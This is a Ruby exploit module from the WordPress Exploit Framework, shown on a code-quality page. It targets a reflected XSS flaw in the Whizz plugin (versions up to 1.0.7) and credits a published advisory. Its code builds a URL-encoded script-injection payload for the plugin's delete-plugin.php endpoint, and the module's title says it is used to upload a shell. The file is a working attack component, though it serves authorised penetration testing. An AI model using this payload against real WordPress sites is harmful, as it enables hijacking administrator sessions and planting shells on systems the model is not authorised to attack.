rastating/wordpress-exploit-framework

View on GitHub
lib/wpxf/modules/exploit/xss/reflected/whizz_reflected_xss_shell_upload.rb

Summary

Maintainability
A
0 mins
Test Coverage
# frozen_string_literal: true

class Wpxf::Exploit::WhizzReflectedXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::ReflectedXss

  def initialize
    super

    update_info(
      name: 'Whizz <= 1.0.7 Reflected XSS Shell Upload',
      author: [
        'Larry W. Cashdollar', # Discovery
        'rastating'            # WPXF module
      ],
      references: [
        ['WPVDB', '8459'],
        ['URL', 'http://www.vapidlabs.com/wp/wp_advisory.php?v=112']
      ],
      date: 'Feb 09 2016'
    )
  end

  def check
    check_plugin_version_from_readme('whizz', '1.0.8')
  end

  def vulnerable_url
    normalize_uri(wordpress_url_plugins, 'whizz', 'plugins', 'delete-plugin.php')
  end

  def url_with_xss
    "#{vulnerable_url}?plugin=%22%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E%3C%22"
  end
end